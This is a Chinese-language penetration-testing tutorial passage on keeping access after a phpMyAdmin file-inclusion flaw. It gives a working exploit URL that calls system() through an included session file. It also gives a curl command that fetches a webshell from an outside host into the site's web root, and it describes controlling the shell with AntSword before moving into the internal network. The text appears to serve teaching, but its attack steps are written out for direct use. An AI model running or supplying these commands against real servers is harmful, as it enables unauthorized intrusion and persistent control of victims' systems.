跳转至

权限维持

内容简介

本小节主要讲解了在存在文件包含的时候,如何去利用包含来写入持久化的 shell,然后使用蚁剑来连接,当然关于更详细的 webshell 的原理、文件包含的原理、webshell 连接工具蚁剑的使用相关姿势和课程可以来报名我们的 Web 课程来深入学习一下。

写入持久化 webshell

因为我们这个文件包含的利用点是包含 tmp 目录下的 Session 文件来实现的,tmp 下都是临时文件,而且也和我们的 Cookie 会话有关,所以我们利用这个文件包含来执行代码就容易失效,所以得想办法写入一个持久化的 shell。

尝试执行命令看看,发现 system 函数可以正常执行代码:

image-20231126174441903

那么尝试直接使用 curl 命令来下载一个木马到网站目录下吧,网站目录也可以使用 pwd 命令来查看:

curl https://www.sqlsec.com/shell.txt > /www/wwwroot/www.pigteacher.com/shell.php

利用文件包含的执行效果就是:

http://<目标网站>/phpMyAdmin/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_si3ckkpffo982omb084nbs2g0b&1=system(%27curl%20https://www.sqlsec.com/shell.txt%20%3E%20/www/wwwroot/www.pigteacher.com/shell.php%27);

蚁剑连接

这样写入成功后,通过蚁剑可以直接连接管理我们的 webshell 了:

image-20231126174623251

蚁剑是一个开源经典的 webshell 管理工具,我们可以在目标服务器上以 webshell 的权限来执行任意命令,增删改查任意的网站文件等:

image-20231126174803545

这样一个基本的命令执行的 web 突破点已经被拿下:

image-20231126174852398

接下来准备内网漫游吧。